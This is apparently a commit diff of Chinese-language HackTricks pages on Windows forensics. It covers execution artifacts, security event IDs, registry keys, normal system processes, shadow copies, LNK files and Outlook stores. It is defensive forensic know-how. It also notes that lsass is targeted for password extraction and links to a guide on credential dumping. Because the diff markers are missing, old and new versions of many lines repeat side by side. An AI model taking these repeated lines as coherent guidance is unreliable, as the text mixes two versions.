每个键值包含一个 **时间戳**,指示最后一次修改的时间。
### SAM
文件/哈希 **SAM** 包含系统的 **用户、组和用户密码** 哈希。
`SAM\Domains\Account\Users`您可以获取用户名、RID、最后登录、最后失败的登录、登录计数器、密码策略以及帐户创建时间。要获取 **哈希**,您还 **需要** 文件/哈希 **SYSTEM**
### Windows 注册表中的有趣条目
{{#ref}}
interesting-windows-registry-keys.md
{{#endref}}
## 执行的程序
### 基本 Windows 进程
在 [这篇文章](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) 中,您可以了解常见的 Windows 进程以检测可疑行为。
### Windows Recent APPs
在注册表 `NTUSER.DAT` 的路径 `Software\Microsoft\Current Version\Search\RecentApps` 中,您可以找到有关 **执行的应用程序**、**最后一次** 执行的时间和 **启动次数** 的子键。
### BAM (后台活动调节器)
您可以使用注册表编辑器打开 `SYSTEM` 文件,在路径 `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` 中找到有关 **每个用户执行的应用程序** 的信息(注意路径中的 `{SID}`)以及 **执行的时间**(时间在注册表的 Data 值中)。
### Windows Prefetch
预取是一种技术,允许计算机静默 **获取用户可能在不久的将来访问的内容所需的资源**,以便更快地访问资源。
Windows 预取由创建 **已执行程序的缓存** 组成,以便能够更快地加载它们。这些缓存作为 `.pf` 文件创建,路径为: `C:\Windows\Prefetch`。在 XP/VISTA/WIN7 中限制为 128 个文件,在 Win8/Win10 中限制为 1024 个文件。
文件名的格式为 `{program_name}-{hash}.pf`(哈希基于可执行文件的路径和参数)。在 W10 中,这些文件是压缩的。请注意,文件的存在仅表示 **程序在某个时刻被执行**
文件 `C:\Windows\Prefetch\Layout.ini` 包含 **被预取文件的文件夹名称**。该文件包含 **执行次数**、**执行日期** 和 **程序打开的文件** 的信息。
要检查这些文件,您可以使用工具 [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
![](<../../../images/image (487).png>)
### Superprefetch
**Superprefetch** 的目标与预取相同,**通过预测将要加载的内容来更快地加载程序**。然而,它并不替代预取服务。\
该服务将在 `C:\Windows\Prefetch\Ag*.db` 中生成数据库文件。
在这些数据库中,您可以找到 **程序的名称**、**执行次数**、**打开的文件**、**访问的卷**、**完整路径**、**时间范围** 和 **时间戳**
您可以使用工具 [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) 访问这些信息。
### SRUM
**系统资源使用监视器** (SRUM) **监视** **进程消耗的资源**。它出现在 W8 中,并将数据存储在位于 `C:\Windows\System32\sru\SRUDB.dat` 的 ESE 数据库中。
它提供以下信息:
- AppID 和路径
- 执行该进程的用户
- 发送的字节
- 接收的字节
- 网络接口
- 连接持续时间
- 进程持续时间
这些信息每 60 分钟更新一次。
您可以使用工具 [**srum_dump**](https://github.com/MarkBaggett/srum-dump) 从该文件中获取日期。
```bash
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
### AppCompatCache (ShimCache)
**AppCompatCache**,也称为 **ShimCache**,是 **Microsoft** 开发的 **应用程序兼容性数据库** 的一部分,用于解决应用程序兼容性问题。该系统组件记录了各种文件元数据,包括:
- 文件的完整路径
- 文件的大小
- 在 **$Standard_Information** (SI) 下的最后修改时间
- ShimCache 的最后更新时间
- 进程执行标志
这些数据根据操作系统的版本存储在注册表的特定位置:
- 对于 XP数据存储在 `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` 下,最多可容纳 96 条目。
- 对于 Server 2003以及 Windows 版本 2008、2012、2016、7、8 和 10存储路径为 `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`,分别容纳 512 和 1024 条目。
要解析存储的信息,建议使用 [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser)。
![](<../../../images/image (488).png>)
### Amcache
**Amcache.hve** 文件本质上是一个注册表蜂巢,记录了在系统上执行的应用程序的详细信息。它通常位于 `C:\Windows\AppCompat\Programas\Amcache.hve`
该文件以存储最近执行的进程记录而著称,包括可执行文件的路径及其 SHA1 哈希。这些信息对于跟踪系统上应用程序的活动非常宝贵。
要提取和分析 **Amcache.hve** 中的数据,可以使用 [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) 工具。以下命令是如何使用 AmcacheParser 解析 **Amcache.hve** 文件内容并以 CSV 格式输出结果的示例:
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
在生成的 CSV 文件中,`Amcache_Unassociated file entries` 特别值得注意,因为它提供了关于未关联文件条目的丰富信息。
生成的最有趣的 CVS 文件是 `Amcache_Unassociated file entries`
### RecentFileCache
此工件仅在 W7 中的 `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` 中找到,包含有关某些二进制文件最近执行的信息。
您可以使用工具 [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) 来解析该文件。
### 计划任务
您可以从 `C:\Windows\Tasks``C:\Windows\System32\Tasks` 中提取它们,并将其作为 XML 读取。
### 服务
您可以在注册表中找到它们,路径为 `SYSTEM\ControlSet001\Services`。您可以查看将要执行的内容及其时间。
### **Windows Store**
已安装的应用程序可以在 `\ProgramData\Microsoft\Windows\AppRepository\` 中找到。\
该存储库中有一个 **log**,记录了 **系统中每个已安装的应用程序**,存储在数据库 **`StateRepository-Machine.srd`** 中。
在该数据库的应用程序表中可以找到列“Application ID”、“PackageNumber”和“Display Name”。这些列包含有关预安装和已安装应用程序的信息如果某些应用程序被卸载可以找到因为已安装应用程序的 ID 应该是连续的。
您还可以在注册表路径 `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`**找到已安装的应用程序**\
`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`**找到已卸载的应用程序**
## Windows 事件
Windows 事件中出现的信息包括:
- 发生了什么
- 时间戳 (UTC + 0)
- 相关用户
- 相关主机 (主机名IP)
- 访问的资产 (文件,文件夹,打印机,服务)
日志位于 `C:\Windows\System32\config`(在 Windows Vista 之前)和 `C:\Windows\System32\winevt\Logs`(在 Windows Vista 之后)。在 Windows Vista 之前,事件日志是二进制格式,之后则为 **XML 格式**,并使用 **.evtx** 扩展名。
事件文件的位置可以在 SYSTEM 注册表中找到,路径为 **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**。
可以通过 Windows 事件查看器 (**`eventvwr.msc`**) 或其他工具如 [**Event Log Explorer**](https://eventlogxp.com) **或** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** 来可视化它们。
## 理解 Windows 安全事件日志
访问事件记录在位于 `C:\Windows\System32\winevt\Security.evtx` 的安全配置文件中。该文件的大小是可调的,当其容量达到时,较旧的事件会被覆盖。记录的事件包括用户登录和注销、用户操作以及安全设置的更改,以及文件、文件夹和共享资产的访问。
### 用户身份验证的关键事件 ID
- **EventID 4624**:表示用户成功认证。
- **EventID 4625**:表示认证失败。
- **EventIDs 4634/4647**:表示用户注销事件。
- **EventID 4672**:表示以管理员权限登录。
#### EventID 4634/4647 中的子类型:
- **Interactive (2)**:直接用户登录。
- **Network (3)**:访问共享文件夹。
- **Batch (4)**:执行批处理过程。
- **Service (5)**:服务启动。
- **Proxy (6)**:代理认证。
- **Unlock (7)**:使用密码解锁屏幕。
- **Network Cleartext (8)**:明文密码传输,通常来自 IIS。
- **New Credentials (9)**:使用不同的凭据进行访问。
- **Remote Interactive (10)**:远程桌面或终端服务登录。
- **Cache Interactive (11)**:使用缓存凭据登录,无需联系域控制器。
- **Cache Remote Interactive (12)**:使用缓存凭据进行远程登录。
- **Cached Unlock (13)**:使用缓存凭据解锁。
#### EventID 4625 的状态和子状态代码:
- **0xC0000064**:用户名不存在 - 可能表示用户名枚举攻击。
- **0xC000006A**:正确的用户名但密码错误 - 可能是密码猜测或暴力破解尝试。
- **0xC0000234**:用户账户被锁定 - 可能是在暴力攻击后导致多次登录失败。
- **0xC0000072**:账户已禁用 - 未经授权尝试访问禁用账户。
- **0xC000006F**:在允许的时间之外登录 - 表示在设定的登录时间之外尝试访问,可能是未经授权的访问迹象。
- **0xC0000070**:违反工作站限制 - 可能是尝试从未经授权的位置登录。
- **0xC0000193**:账户过期 - 使用过期用户账户的访问尝试。
- **0xC0000071**:密码过期 - 使用过时密码的登录尝试。
- **0xC0000133**:时间同步问题 - 客户端和服务器之间的大时间差异可能表明更复杂的攻击,如票据传递攻击。
- **0xC0000224**:需要强制更改密码 - 频繁的强制更改可能表明试图破坏账户安全。
- **0xC0000225**:表示系统错误而非安全问题。
- **0xC000015b**:拒绝的登录类型 - 使用未经授权的登录类型进行的访问尝试,例如用户尝试执行服务登录。
#### EventID 4616
- **时间更改**:系统时间的修改,可能会模糊事件的时间线。
#### EventID 6005 和 6006
- **系统启动和关闭**EventID 6005 表示系统启动,而 EventID 6006 表示系统关闭。
#### EventID 1102
- **日志删除**:安全日志被清除,通常是掩盖非法活动的红旗。
#### USB 设备跟踪的事件 ID
- **20001 / 20003 / 10000**USB 设备首次连接。
- **10100**USB 驱动程序更新。
- **EventID 112**USB 设备插入的时间。
有关模拟这些登录类型和凭据转储机会的实际示例,请参阅 [Altered Security 的详细指南](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)。
事件详细信息,包括状态和子状态代码,提供了对事件原因的进一步洞察,特别是在事件 ID 4625 中尤为显著。
### 恢复 Windows 事件
为了提高恢复已删除 Windows 事件的机会,建议通过直接拔掉电源来关闭可疑计算机。**Bulk_extractor** 是一款指定 `.evtx` 扩展名的恢复工具,推荐用于尝试恢复此类事件。
### 通过 Windows 事件识别常见攻击
有关利用 Windows 事件 ID 识别常见网络攻击的全面指南,请访问 [Red Team Recipe](https://redteamrecipe.com/event-codes/)。
#### 暴力攻击
通过多个 EventID 4625 记录可识别,若攻击成功,则会跟随一个 EventID 4624。
#### 时间更改
通过 EventID 4616 记录,系统时间的更改可能会使取证分析变得复杂。
#### USB 设备跟踪
用于 USB 设备跟踪的有用系统事件 ID 包括 20001/20003/10000首次使用10100驱动程序更新和 EventID 112来自 DeviceSetupManager 的插入时间戳)。
#### 系统电源事件
EventID 6005 表示系统启动,而 EventID 6006 表示关闭。
#### 日志删除
安全 EventID 1102 表示日志被删除,这是取证分析中的关键事件。
{{#include ../../../banners/hacktricks-training.md}}

101
src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View File

@ -1,101 +0,0 @@
# 有趣的 Windows 注册表键
### 有趣的 Windows 注册表键
{{#include ../../../banners/hacktricks-training.md}}
### **Windows 版本和所有者信息**
- 位于 **`Software\Microsoft\Windows NT\CurrentVersion`**,您可以以简单的方式找到 Windows 版本、服务包、安装时间和注册所有者的名称。
### **计算机名称**
- 主机名位于 **`System\ControlSet001\Control\ComputerName\ComputerName`** 下。
### **时区设置**
- 系统的时区存储在 **`System\ControlSet001\Control\TimeZoneInformation`** 中。
### **访问时间跟踪**
- 默认情况下,最后访问时间跟踪是关闭的 (**`NtfsDisableLastAccessUpdate=1`**)。要启用它,请使用:
`fsutil behavior set disablelastaccess 0`
### Windows 版本和服务包
- **Windows 版本** 指示版本例如家庭版、专业版及其发布例如Windows 10、Windows 11**服务包** 是包含修复和有时新功能的更新。
### 启用最后访问时间
- 启用最后访问时间跟踪可以让您看到文件最后一次打开的时间,这对于取证分析或系统监控至关重要。
### 网络信息详细信息
- 注册表保存了关于网络配置的广泛数据,包括 **网络类型无线、有线、3G****网络类别(公共、私人/家庭、域/工作)**,这些对于理解网络安全设置和权限至关重要。
### 客户端缓存 (CSC)
- **CSC** 通过缓存共享文件的副本来增强离线文件访问。不同的 **CSCFlags** 设置控制如何以及缓存哪些文件,影响性能和用户体验,特别是在连接不稳定的环境中。
### 自动启动程序
- 列在各种 `Run``RunOnce` 注册表键中的程序在启动时自动启动,影响系统启动时间,并可能成为识别恶意软件或不需要软件的关注点。
### Shellbags
- **Shellbags** 不仅存储文件夹视图的偏好,还提供文件夹访问的取证证据,即使该文件夹不再存在。它们对于调查非常宝贵,揭示了通过其他方式不明显的用户活动。
### USB 信息和取证
- 注册表中存储的关于 USB 设备的详细信息可以帮助追踪哪些设备连接到计算机,可能将设备与敏感文件传输或未经授权的访问事件联系起来。
### 卷序列号
- **卷序列号** 对于跟踪文件系统的特定实例至关重要,在需要跨不同设备建立文件来源的取证场景中非常有用。
### **关机详细信息**
- 关机时间和计数(后者仅适用于 XP保存在 **`System\ControlSet001\Control\Windows`** 和 **`System\ControlSet001\Control\Watchdog\Display`** 中。
### **网络配置**
- 有关详细的网络接口信息,请参阅 **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。
- 首次和最后的网络连接时间,包括 VPN 连接,记录在 **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** 的各种路径下。
### **共享文件夹**
- 共享文件夹和设置位于 **`System\ControlSet001\Services\lanmanserver\Shares`** 下。客户端缓存 (CSC) 设置决定离线文件的可用性。
### **自动启动的程序**
- 路径如 **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** 和 `Software\Microsoft\Windows\CurrentVersion` 下的类似条目详细说明了设置为在启动时运行的程序。
### **搜索和输入的路径**
- 资源管理器搜索和输入的路径在注册表中跟踪,位于 **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** 下的 WordwheelQuery 和 TypedPaths。
### **最近的文档和 Office 文件**
- 最近访问的文档和 Office 文件记录在 `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` 和特定 Office 版本路径中。
### **最近使用的 (MRU) 项目**
- MRU 列表,指示最近的文件路径和命令,存储在 `NTUSER.DAT` 下的各种 `ComDlg32``Explorer` 子键中。
### **用户活动跟踪**
- 用户助手功能记录详细的应用程序使用统计信息,包括运行次数和最后运行时间,位于 **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。
### **Shellbags 分析**
- Shellbags揭示文件夹访问详细信息存储在 `USRCLASS.DAT``NTUSER.DAT` 下的 `Software\Microsoft\Windows\Shell` 中。使用 **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** 进行分析。
### **USB 设备历史**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** 和 **`HKLM\SYSTEM\ControlSet001\Enum\USB`** 包含有关连接的 USB 设备的丰富详细信息,包括制造商、产品名称和连接时间戳。
- 通过在 `NTUSER.DAT` 注册表项中搜索设备的 **{GUID}**,可以确定与特定 USB 设备相关的用户。
- 最后挂载的设备及其卷序列号可以通过 `System\MountedDevices``Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` 分别追踪。
本指南概述了访问 Windows 系统上详细系统、网络和用户活动信息的关键路径和方法,旨在提供清晰和可用性。
{{#include ../../../banners/hacktricks-training.md}}

106
src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
View File

@ -1,106 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
## smss.exe
**会话管理器**。\
会话 0 启动 **csrss.exe****wininit.exe** (**操作系统** **服务**),而会话 1 启动 **csrss.exe****winlogon.exe** (**用户** **会话**)。然而,您应该在进程树中只看到该 **二进制文件****一个进程**,且没有子进程。
此外,除了 0 和 1 的会话可能意味着正在发生 RDP 会话。
## csrss.exe
**客户端/服务器运行子系统进程**。\
它管理 **进程****线程**,使 **Windows** **API** 可供其他进程使用,并且还 **映射驱动器字母**,创建 **临时文件**,并处理 **关机** **过程**
在会话 0 中有一个 **正在运行的进程,另一个在会话 1 中**(因此在进程树中有 **2 个进程**)。每个新会话会创建一个新的进程。
## winlogon.exe
**Windows 登录进程**。\
它负责用户 **登录**/**注销**。它启动 **logonui.exe** 以请求用户名和密码,然后调用 **lsass.exe** 进行验证。
然后它启动 **userinit.exe**,该程序在 **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** 中指定,键为 **Userinit**
此外,之前的注册表应在 **Shell 键** 中有 **explorer.exe**,否则可能会被滥用作为 **恶意软件持久性方法**
## wininit.exe
**Windows 初始化进程**。 \
它在会话 0 中启动 **services.exe**、**lsass.exe** 和 **lsm.exe**。应该只有 1 个进程。
## userinit.exe
**Userinit 登录应用程序**。\
加载 **HKCU 中的 ntduser.dat**,初始化 **用户** **环境**,并运行 **登录** **脚本****GPO**
它启动 **explorer.exe**
## lsm.exe
**本地会话管理器**。\
它与 smss.exe 一起工作以操纵用户会话:登录/注销、启动 shell、锁定/解锁桌面等。
在 W7 之后lsm.exe 被转变为服务 (lsm.dll)。
在 W7 中应该只有 1 个进程,并且其中一个是运行 DLL 的服务。
## services.exe
**服务控制管理器**。\
**加载** 配置为 **自动启动****服务****驱动程序**
它是 **svchost.exe**、**dllhost.exe**、**taskhost.exe**、**spoolsv.exe** 等的父进程。
服务在 `HKLM\SYSTEM\CurrentControlSet\Services` 中定义,该进程在内存中维护一个服务信息的数据库,可以通过 sc.exe 查询。
注意 **某些** **服务** 将在 **自己的进程中运行**,而其他服务将 **共享一个 svchost.exe 进程**
应该只有 1 个进程。
## lsass.exe
**本地安全授权子系统**。\
它负责用户 **身份验证** 并创建 **安全** **令牌**。它使用位于 `HKLM\System\CurrentControlSet\Control\Lsa` 的身份验证包。
它写入 **安全** **事件** **日志**,并且应该只有 1 个进程。
请记住,该进程是高度攻击的目标,用于提取密码。
## svchost.exe
**通用服务主机进程**。\
它在一个共享进程中托管多个 DLL 服务。
通常,您会发现 **svchost.exe** 是使用 `-k` 标志启动的。这将查询注册表 **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**,其中将有一个带有 -k 中提到的参数的键,该键将包含在同一进程中启动的服务。
例如:`-k UnistackSvcGroup` 将启动:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
如果 **标志 `-s`** 也与参数一起使用,则 svchost 被要求 **仅启动指定的服务**
将会有多个 `svchost.exe` 进程。如果其中任何一个 **没有使用 `-k` 标志**,那么这非常可疑。如果您发现 **services.exe 不是父进程**,那也是非常可疑的。
## taskhost.exe
该进程充当从 DLL 运行的进程的主机。它还加载从 DLL 运行的服务。
在 W8 中称为 taskhostex.exe在 W10 中称为 taskhostw.exe。
## explorer.exe
这是负责 **用户桌面** 和通过文件扩展名启动文件的进程。
**每个登录用户应该只生成 1 个** 进程。
这是从 **userinit.exe** 运行的,应该被终止,因此 **该进程不应有父进程**
# 捕获恶意进程
- 它是否从预期路径运行?(没有 Windows 二进制文件从临时位置运行)
- 它是否与奇怪的 IP 通信?
- 检查数字签名Microsoft 伪造物应已签名)
- 拼写是否正确?
- 是否在预期的 SID 下运行?
- 父进程是否是预期的进程(如果有的话)?
- 子进程是否是预期的进程?(没有 cmd.exe、wscript.exe、powershell.exe..
{{#include ../../../banners/hacktricks-training.md}}

124
src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
View File

@ -1,54 +1,52 @@
# Windows 证据
## Windows 证据
# Windows Artifacts
{{#include ../../../banners/hacktricks-training.md}}
## 通用 Windows 证据
## Generic Windows Artifacts
### Windows 10 通知
### Windows 10 Notifications
在路径 `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` 中可以找到数据库 `appdb.dat`(在 Windows 周年更新之前)或 `wpndatabase.db`(在 Windows 周年更新之后)。
在路径 `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications`,您可以找到数据库 `appdb.dat`(在 Windows 周年更新之前)或 `wpndatabase.db`(在 Windows 周年更新之后)。
在这个 SQLite 数据库中,可以找到 `Notification` 表,里面包含所有的通知(以 XML 格式),可能包含有趣的数据
在这个 SQLite 数据库中,您可以找到 `Notification` 表,其中包含所有可能包含有趣数据的通知(以 XML 格式)
### 时间线
### Timeline
时间线是 Windows 的一个特性,提供 **访问过的网页、编辑的文档和执行的应用程序的时间顺序历史**
Timeline 是 Windows 的一个特性,提供 **访问过的网页、编辑的文档和执行的应用程序的时间顺序历史**
数据库位于路径 `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。这个数据库可以用 SQLite 工具打开,者用工具 [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **生成的 2 个文件,这些文件可以用工具** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**。
数据库位于路径 `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。这个数据库可以使用 SQLite 工具或工具 [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) 打开,**该工具生成 2 个可以使用工具** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开的文件**。
### ADS(备用数据流)
### ADS (Alternate Data Streams)
下载的文件可能包含 **ADS Zone.Identifier**,指示 **它是如何** 从内网、互联网等 **下载的**。一些软件(如浏览器)通常会提供更多 **信息**,例如 **文件下载的 URL**。
下载的文件可能包含 **ADS Zone.Identifier**,指示 **它是如何** 从内网、互联网等 **下载的**。一些软件(如浏览器)通常会提供更多 **信息**,例如文件下载的 **URL**。
## **文件备份**
## **File Backups**
### 回收站
### Recycle Bin
在 Vista/Win7/Win8/Win10 中,**回收站**可以在驱动器根目录的文件夹 **`$Recycle.bin`** 中找到(`C:\$Recycle.bin`)。\
当在此文件夹中删除文件时,会创建 2 个特定文件:
- `$I{id}`: 文件信息(删除日期
- `$I{id}`: 文件信息(删除日期}
- `$R{id}`: 文件内容
![](<../../../images/image (1029).png>)
拥有这些文件后,可以使用工具 [**Rifiuti**](https://github.com/abelcheung/rifiuti2) 获取已删除文件的原始地址和删除日期(使用 `rifiuti-vista.exe` 适用于 Vista Win10
拥有这些文件后,可以使用工具 [**Rifiuti**](https://github.com/abelcheung/rifiuti2) 获取已删除文件的原始地址和删除日期(使用 `rifiuti-vista.exe` 适用于 Vista Win10
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](<../../../images/image (495) (1) (1) (1).png>)
### 卷影复制
### 卷影副本
卷影复制是微软Windows中包含的一项技术可以创建计算机文件或卷的**备份副本**或快照,即使在使用也可以。
卷影副本是微软Windows中包含的一项技术可以创建计算机文件或卷的**备份副本**或快照,即使在使用也可以。
这些备份通常位于文件系统根目录下的`\System Volume Information`中,名称由以下图像中显示的**UIDs**组成:
![](<../../../images/image (94).png>)
使用**ArsenalImageMounter**挂载取证镜像,可以使用工具[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)检查卷影复制,甚至**提取文件**。
使用**ArsenalImageMounter**挂载取证镜像,可以使用工具[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)检查卷影副本,甚至**提取文件**。
![](<../../../images/image (576).png>)
@ -56,9 +54,9 @@
![](<../../../images/image (254).png>)
注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`也包含有关`卷影复制`的配置信息。
注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`也包含有关`卷影副本`的配置信息。
### Office自动保存文件
### Office自动保存文件
您可以在以下位置找到Office自动保存的文件`C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
@ -75,11 +73,11 @@ Windows会在用户**打开、使用或创建文件**时**自动****创建**这
当创建一个文件夹时,也会创建指向该文件夹、父文件夹和祖父文件夹的链接。
这些自动创建的链接文件**包含有关来源的信息**,例如它是一个**文件**还是一个**文件夹**,该文件的**MAC** **时间**文件存储的**卷信息**以及**目标文件的文件夹**。这些信息在文件被删除的情况下可以用于恢复这些文件。
这些自动创建的链接文件**包含有关来源的信息**,例如它是**文件**还是**文件夹**、该文件的**MAC** **时间**文件存储的**卷信息**以及**目标文件的文件夹**。这些信息在文件被删除的情况下可以用于恢复这些文件。
此外,链接文件的**创建日期**是原始文件**首次使用**的**时间**,而链接文件的**修改日期**是原始文件**最后使用**的**时间**。
此外,链接文件的**创建日期**是原始文件**首次****使用**的**时间**,而链接文件的**修改日期**是原始文件**最后****使用**的**时间**。
要检查这些文件,可以使用[**LinkParser**](http://4discovery.com/our-tools/)。
要检查这些文件,可以使用[**LinkParser**](http://4discovery.com/our-tools/)。
在此工具中,您将找到**2组**时间戳:
@ -92,7 +90,7 @@ Windows会在用户**打开、使用或创建文件**时**自动****创建**这
2. LinkAccessDate
3. LinkCreationDate。
第一组时间戳引用**文件本身的时间戳**。第二组引用**链接文件的时间戳**。
第一组时间戳引用的是**文件本身的时间戳**。第二组引用的是**链接文件的时间戳**。
您可以通过运行Windows CLI工具[**LECmd.exe**](https://github.com/EricZimmerman/LECmd)获取相同的信息。
```
@ -108,7 +106,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
自定义的 jumplists 存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,通常是因为文件发生了某些 **重要** 事件(可能被标记为收藏)。
任何 jumplist 的 **创建时间** 表示 **文件首次访问的时间****修改时间为最后一次**
任何 jumplist 的 **创建时间** 表示 **文件首次访问的时间****修改时间** 表示最后一次访问的时间
您可以使用 [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md) 检查 jumplists。
@ -128,7 +126,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
- Microsoft Office Recent Folder
- Jumplists
请注意,些 LNK 文件不是指向原始路径,而是指向 WPDNSE 文件夹:
请注意,些 LNK 文件不是指向原始路径,而是指向 WPDNSE 文件夹:
![](<../../../images/image (218).png>)
@ -136,13 +134,13 @@ WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不
### 注册表信息
[查看此页面以了解](interesting-windows-registry-keys.md#usb-information) 哪些注册表键包含有关连接的 USB 设备的有趣信息。
[查看此页面以了解](interesting-windows-registry-keys.md#usb-information) 哪些注册表键包含有关 USB 连接设备的有趣信息。
### setupapi
检查文件 `C:\Windows\inf\setupapi.dev.log` 以获取 USB 连接生的时间戳(搜索 `Section start`)。
检查文件 `C:\Windows\inf\setupapi.dev.log` 以获取 USB 连接生的时间戳(搜索 `Section start`)。
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
### USB Detective
@ -150,9 +148,9 @@ WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不
![](<../../../images/image (452).png>)
### Plug and Play Cleanup
### 插拔清理
名为“Plug and Play Cleanup”的计划任务主要用于删除过时的驱动程序版本。与其指定的保留最新驱动程序包版本的目的相反,在线来源表明它还针对过去 30 天未活动的驱动程序。因此,过去 30 天未连接的可移动设备的驱动程序可能会被删除。
名为“插拔清理”的计划任务主要用于删除过时的驱动程序版本。与其指定的保留最新驱动程序包版本的目的相反,在线来源表明它还针对过去 30 天未活动的驱动程序。因此,过去 30 天未连接的可移动设备的驱动程序可能会被删除。
该任务位于以下路径:`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`
@ -181,7 +179,7 @@ WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不
![](<../../../images/image (593).png>)
### Windows Mail 应用
### Windows 邮件应用
此应用程序以 HTML 或文本格式保存电子邮件。您可以在 `\Users\<username>\AppData\Local\Comms\Unistore\data\3\` 的子文件夹中找到电子邮件。电子邮件以 `.dat` 扩展名保存。
@ -196,7 +194,7 @@ WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不
- `Mapi-Client-Submit-Time`:发送电子邮件时系统的时间
- `Mapi-Conversation-Index`:线程的子消息数量和每条消息的时间戳
- `Mapi-Entry-ID`:消息标识符。
- `Mappi-Message-Flags``Pr_last_Verb-Executed`:有关 MAPI 客户端的信息(消息已读?未读?已回复?重定向?不在办公室?)
- `Mappi-Message-Flags``Pr_last_Verb-Executed`:有关 MAPI 客户端的信息(消息已读?未读?已回复?重定向?不在办公室?)
在 Microsoft Outlook 客户端中,所有发送/接收的消息、联系人数据和日历数据都存储在 PST 文件中,路径为:
@ -211,9 +209,9 @@ WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不
### Microsoft Outlook OST 文件
**OST 文件** 是 Microsoft Outlook 在配置为 **IMAP****Exchange** 服务器时生成的,存储的信息与 PST 文件类似。此文件与服务器同步,保留 **过去 12 个月** 的数据,最大大小为 50GB并位于与 PST 文件相同的目录中。要查看 OST 文件,可以使用 [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。
**OST 文件** 是 Microsoft Outlook 在配置为 **IMAP****Exchange** 服务器时生成的,存储与 PST 文件类似的信息。此文件与服务器同步,保留 **过去 12 个月** 的数据,最大大小为 50GB并位于与 PST 文件相同的目录中。要查看 OST 文件,可以使用 [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。
### 检索附件
### 恢复附件
丢失的附件可能可以从以下位置恢复:
